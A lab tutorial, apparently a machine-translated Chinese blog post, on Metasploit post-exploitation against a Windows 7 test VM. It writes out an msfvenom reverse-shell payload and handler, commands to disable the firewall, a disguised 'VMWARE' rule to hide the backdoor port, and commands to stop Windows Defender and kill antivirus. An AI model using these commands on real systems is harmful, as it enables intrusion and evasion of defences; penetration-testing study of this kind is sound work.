当前位置:网站首页>Intranet information collection of Intranet penetration (I)
Intranet information collection of Intranet penetration (I)
2022-07-06 14:07:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
03 adopt shell Turn off firewall
04 Turn off antivirus software
Intranet information collection of Intranet penetration ( Two )_ Unknown white hat blog -CSDN Blog
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
01msf rebound shell
First generate a payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe

02msf rebound shell
Configure the bounce session handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit

take payload Send it to the target machine to execute

Successful implementation

linux Can't recognize window Chinese characters can be garbled , Modify the code page (65001 It stands for UTF-8)

03 adopt shell Turn off firewall
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off ( Turn off firewall )
netsh advfirewall show allprofiles ( Check the firewall status )

Add firewall rules through policies to hide behaviors
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
Restart and take effect ( Make win7 restart ):
shutdown -r -f -t 0
04 Turn off antivirus software
close windefend
net stop windefend
Turn off antivirus software
run killav
run post/windows/manage/killav
边栏推荐
- [dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
- Network layer - simple ARP disconnection
- 7-1 输出2到n之间的全部素数(PTA程序设计)
- Yugu p1012 spelling +p1019 word Solitaire (string)
- HackMyvm靶机系列(4)-vulny
- Experiment 4 array
- HackMyvm靶机系列(2)-warrior
- Spot gold prices rose amid volatility, and the rise in U.S. prices is likely to become the key to the future
- 网络基础详解
- [err] 1055 - expression 1 of order by clause is not in group by clause MySQL
猜你喜欢

Mixlab unbounded community white paper officially released

搭建域环境(win)

3. Input and output functions (printf, scanf, getchar and putchar)

Strengthen basic learning records
![[VMware abnormal problems] problem analysis & Solutions](/img/64/f44864da600b61a1a646a5865a2083.jpg)
[VMware abnormal problems] problem analysis & Solutions

Matlab opens M file garbled solution

Programme de jeu de cartes - confrontation homme - machine

QT meta object qmetaobject indexofslot and other functions to obtain class methods attention

攻防世界MISC练习区(gif 掀桌子 ext3 )

MATLAB打开.m文件乱码解决办法
随机推荐
[data processing of numpy and pytoch]
Safe driving skills on ice and snow roads
7-9 make house number 3.0 (PTA program design)
【Numpy和Pytorch的数据处理】
【VMware异常问题】问题分析&解决办法
渗透测试学习与实战阶段分析
1143_ SiCp learning notes_ Tree recursion
附加简化版示例数据库到SqlServer数据库实例中
【黑马早报】上海市监局回应钟薛高烧不化;麦趣尔承认两批次纯牛奶不合格;微信内测一个手机可注册俩号;度小满回应存款变理财产品...
HackMyvm靶机系列(2)-warrior
《英特尔 oneAPI—打开异构新纪元》
Renforcer les dossiers de base de l'apprentissage
7-3 构造散列表(PTA程序设计)
7-5 走楼梯升级版(PTA程序设计)
强化学习基础记录
2022 Teddy cup data mining challenge question C idea and post game summary
XSS之冷门事件
Hackmyvm target series (3) -visions
Hackmyvm target series (4) -vulny
Get started with typescript